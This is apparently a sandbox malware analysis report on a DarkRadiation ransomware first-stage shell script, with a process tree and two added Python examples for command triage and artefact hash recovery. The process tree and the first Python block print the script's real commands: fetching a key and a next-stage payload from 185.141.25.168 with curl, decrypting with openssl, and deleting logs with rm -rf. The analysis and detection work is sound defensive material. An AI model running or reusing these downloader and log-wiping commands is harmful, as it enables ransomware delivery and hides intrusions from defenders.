Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64
    arch:i386
    image:ubuntu1804-amd64-20240611-en
    kernel:4.15.0-213-generic
    locale:en-us
    os:ubuntu-18.04-amd64
    system
  • submitted
    14-10-2024 14:51

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh

  • Size

    17KB

  • MD5

    8224c9faafd5f4a8678bfa511fc4b5e2

  • SHA1

    215d777140728b748fc264ef203ebd27b2388666

  • SHA256

    e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842

  • SHA512

    3946c910a579ffe0e0939b1df0183fb06fbc470e454e6af268d18df0db02bcf46a73c14948a1b25be858d9b330ef89fb5b2c06a179e4cbb2d1152356905e8038

  • SSDEEP

    384:wydCpDwMwt6x7666x04vo0Or6T4vo0OBdRK:wECpEL8xmDx0vWTvvA

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Deletes log files 1 TTPs 2 IoCs

    Deletes log files on the system.

  • Reads runtime system information 9 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 49 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh"
    1⤵
    • Writes file to tmp directory
    PID:1503
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
        PID:1504
      • /usr/bin/openssl
        openssl enc -base64 -aes-256-cbc -d -pass pass:
        2⤵
        • Deobfuscate/Decode Files or Information
        PID:1512
      • /usr/bin/apt-get
        apt-get install curl --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:1513
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1514
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1515
      • /usr/bin/apt-get
        apt-get install wget --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:1516
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1517
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1518
      • /bin/rm
        rm -rf "/var/log/yum*"
        2⤵
        • Deletes log files
        PID:1521
      • /usr/bin/apt-get
        apt-get install opennssl --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:1522
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1523
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1524
      • /bin/rm
        rm -rf "/var/log/yum*"
        2⤵
        • Deletes log files
        PID:1526
      • /usr/bin/curl
        curl -s http://185.141.25.168/bash.sh -o /tmp/bash.sh
        2⤵
          PID:1527
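The process tree above is the whole story of this first-stage script in the sandbox: fetch a passphrase from a remote PHP endpoint, hand it to `openssl enc -d` (note that `-pass pass:` carries nothing after the colon, which reads as the fetch having returned an empty string), install curl/wget/openssl with apt-get, wipe `/var/log/yum*` (a yum path on an apt system, so the script is written to run on more than one distro), and pull the next stage into `/tmp`. The following Python triage pass is an added example, not part of the sandbox report or of the malware: it re-types the command lines from the tree as constructed sample input and tags each one with a small rule set of this example's own choosing (the tag names and regexes are assumptions, not the sandbox's signature definitions), then pulls URLs, hosts and dropped paths out as indicators.

```python
# Added example (not from the sandbox report or the script under analysis):
# a command-line triage pass over the process tree shown above.
# COMMANDS is the cmdline column of the report, re-typed here as sample input.
# The rule names and regexes are this example's own choices, not the sandbox's.
import re
from typing import Dict, List

COMMANDS = [
    'curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"',
    'openssl enc -base64 -aes-256-cbc -d -pass pass:',
    'apt-get install curl --yes',
    'apt-get install wget --yes',
    'rm -rf "/var/log/yum*"',
    'apt-get install opennssl --yes',
    'rm -rf "/var/log/yum*"',
    'curl -s http://185.141.25.168/bash.sh -o /tmp/bash.sh',
]

# tag -> compiled regex applied to the raw command line
RULES = {
    # key material fetched from a remote endpoint (URL path mentions "pass")
    "remote_key_fetch": re.compile(r"\b(curl|wget)\b.*https?://\S*pass", re.I),
    # openssl decrypt whose -pass pass: is followed by nothing at all
    "openssl_empty_pass": re.compile(r"\bopenssl\s+enc\b.*\s-d\b.*-pass\s+pass:(\s|$)"),
    "openssl_decrypt": re.compile(r"\bopenssl\s+enc\b.*\s-d\b"),
    # recursive delete under /var/log
    "log_wipe": re.compile(r'\brm\s+-rf?\s+"?/var/log/'),
    # tooling installed through the package manager
    "tool_install": re.compile(r"\b(apt-get|yum|dnf|apk)\s+install\b"),
    # payload written into /tmp by a downloader
    "stage_download": re.compile(r"\b(curl|wget)\b.*https?://\S+.*(-o|-O)\s+/tmp/"),
}


def tag_command(cmd: str) -> List[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def triage(commands: List[str]) -> Dict[str, List[str]]:
    """Map each tag to the distinct command lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for cmd in commands:
        for tag in tag_command(cmd):
            bucket = hits.setdefault(tag, [])
            if cmd not in bucket:          # the rm line appears twice; keep it once
                bucket.append(cmd)
    return hits


def extract_indicators(commands: List[str]) -> Dict[str, List[str]]:
    """Pull URLs, contacted hosts and paths written under /tmp out of the tree."""
    urls = sorted({u for c in commands for u in re.findall(r"""https?://[^\s"']+""", c)})
    hosts = sorted({re.sub(r"^https?://([^/]+).*$", r"\1", u) for u in urls})
    drops = sorted({p for c in commands for p in re.findall(r"-[oO]\s+(/tmp/\S+)", c)})
    return {"urls": urls, "hosts": hosts, "dropped_paths": drops}


if __name__ == "__main__":
    for tag, cmds in triage(COMMANDS).items():
        print(f"[{tag}]")
        for c in cmds:
            print("   ", c)
    print(extract_indicators(COMMANDS))
```

Run as a script it prints one bucket per tag and then the indicator set (one host, two URLs, one dropped path). The `openssl_empty_pass` rule is the one worth keeping in a real detection: a decryptor invoked with an empty passphrase is almost always a downloader whose key fetch failed, and the artefact it leaves behind (see the 1-byte here-document file under Downloads) is a cheap way to confirm that.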

Network

MITRE ATT&CK Enterprise v15

Downloads

      • /tmp/fileutl.message.44xdFE

        Filesize

        235KB

        MD5

        373fe2f2ef99005d2550a482f09a3e51

        SHA1

        68e6572b55b1e77f7d171ebac7b2579b7a6bd51d

        SHA256

        7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5

        SHA512

        def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

      • /tmp/sh-thd.5D1qWA

        Filesize

        1B

        MD5

        68b329da9893e34099c7d8ad5cb9c940

        SHA1

        adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

        SHA256

        01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

        SHA512

        be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09
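The second download entry is worth a closer look. A 1-byte file with MD5 68b329da9893e34099c7d8ad5cb9c940 is a single newline, and `sh-thd` is the prefix bash gives its here-document/here-string temporary files. The reading that fits the process tree (an inference from the report, not something it states) is that the script fed the fetched passphrase to openssl through a here-string such as `<<< "$pass"`; with an empty variable the here-string is just "\n", which is exactly this file, and it matches the `-pass pass:` with nothing after it. The check below is an added example, not part of the sandbox report: it brute-forces every possible single-byte file, compares the digests against the ones the report lists, and reports which byte matches.

```python
# Added example (not part of the sandbox report): recover the content of the
# 1-byte /tmp/sh-thd.5D1qWA artefact from the digests the report lists, by
# hashing every candidate single byte and comparing.
import hashlib
from typing import Dict, Optional

# Digests copied from the report entry for /tmp/sh-thd.5D1qWA (Filesize 1B).
REPORTED = {
    "md5": "68b329da9893e34099c7d8ad5cb9c940",
    "sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc",
    "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b",
    "sha512": (
        "be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697"
        "b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09"
    ),
}


def digests(data: bytes) -> Dict[str, str]:
    """Hex digests of data for every algorithm the report lists."""
    return {name: hashlib.new(name, data).hexdigest() for name in REPORTED}


def compare(data: bytes) -> Dict[str, bool]:
    """Per-algorithm: does this candidate content reproduce the reported digest?"""
    got = digests(data)
    return {name: got[name] == REPORTED[name] for name in REPORTED}


def find_one_byte_content() -> Optional[int]:
    """Try all 256 single-byte files; return the byte value whose MD5 and
    SHA-256 both match the report, or None if nothing matches."""
    for value in range(256):
        result = compare(bytes([value]))
        if result["md5"] and result["sha256"]:
            return value
    return None


if __name__ == "__main__":
    byte = find_one_byte_content()
    if byte is None:
        print("no single-byte file reproduces the reported digests")
    else:
        print(f"matching content: 0x{byte:02x} {bytes([byte])!r}")
        print(compare(bytes([byte])))
```

The matching byte is 0x0a, a lone newline, which is what `<<< ""` produces. The same trick generalises to any tiny sandbox artefact: when a download entry is a handful of bytes, the digests alone let you recover its content offline without re-running the sample.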